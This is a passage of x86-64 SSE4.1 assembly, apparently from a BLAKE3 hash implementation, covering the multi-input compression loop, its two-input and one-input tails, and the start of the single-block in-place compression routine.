paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
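// mov does not write RFLAGS, so the jne below still acts on the
// cmp rdx, r15 from the top of this per-block loop.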
mov eax, r13d
jne 9b
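// Transpose the four 4-word output CVs back to row order and store them
// at a 32-byte stride.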
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
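// Advance the 4-lane block counters with the same MSB-flip carry trick.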
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
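// Fewer than four inputs remain: handle two, then one.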
test esi, 0x2
je 3f
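// 2-input tail: two independent xmm state copies (xmm0-3 and xmm8-11).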
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
pinsrd xmm14, dword ptr [rsp+0x124], 1
pinsrd xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
pinsrd xmm3, eax, 3
pinsrd xmm11, eax, 3
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm12, xmmword ptr [ROT16+rip]
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movaps xmm13, xmmword ptr [ROT8+rip]
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm12
pshufb xmm11, xmm12
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshufb xmm3, xmm13
pshufb xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pblendw xmm13, xmm12, 0xCC
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
pblendw xmm12, xmm6, 0xC0
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pblendw xmm6, xmm5, 0xCC
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
pblendw xmm5, xmm14, 0xC0
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
movdqa xmm0, xmmword ptr [rsp+0x130]
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm2, xmmword ptr [rsp+0x120]
movdqu xmm3, xmmword ptr [rsp+0x118]
movdqu xmm4, xmmword ptr [rsp+0x128]
blendvps xmm1, xmm3, xmm0
blendvps xmm2, xmm4, xmm0
movdqa xmmword ptr [rsp+0x110], xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
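// 1-input tail: single xmm state.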
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
pinsrd xmm13, dword ptr [rsp+0x120], 1
pinsrd xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm3, xmm13
pinsrd xmm3, eax, 3
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
pshufd xmm9, xmm4, 0x0F
pshufd xmm4, xmm8, 0x39
movdqa xmm8, xmm6
shufps xmm8, xmm7, 250
pblendw xmm9, xmm8, 0xCC
movdqa xmm8, xmm7
punpcklqdq xmm8, xmm5
pblendw xmm8, xmm6, 0xC0
pshufd xmm8, xmm8, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmm5, xmm9
movdqa xmm6, xmm8
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
jmp 4b
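// One-block compression in place. Matching the C prototype's SysV mapping:
// rdi = cv, rsi = block, dl = block_len, rcx = counter, r8b = flags;
// xmm3 packs (counter_lo, counter_hi, block_len, flags).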
.p2align 6
blake3_compress_in_place_sse41:
_blake3_compress_in_place_sse41:
_CET_ENDBR
movups xmm0, xmmword ptr [rdi]
movups xmm1, xmmword ptr [rdi+0x10]
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl r8, 32
add rdx, r8
movq xmm3, rcx
movq xmm4, rdx
punpcklqdq xmm3, xmm4
movups xmm4, xmmword ptr [rsi]
movups xmm5, xmmword ptr [rsi+0x10]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [rsi+0x20]
movups xmm7, xmmword ptr [rsi+0x30]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
movaps xmm14, xmmword ptr [ROT8+rip]
movaps xmm15, xmmword ptr [ROT16+rip]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm15
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
pshufb xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
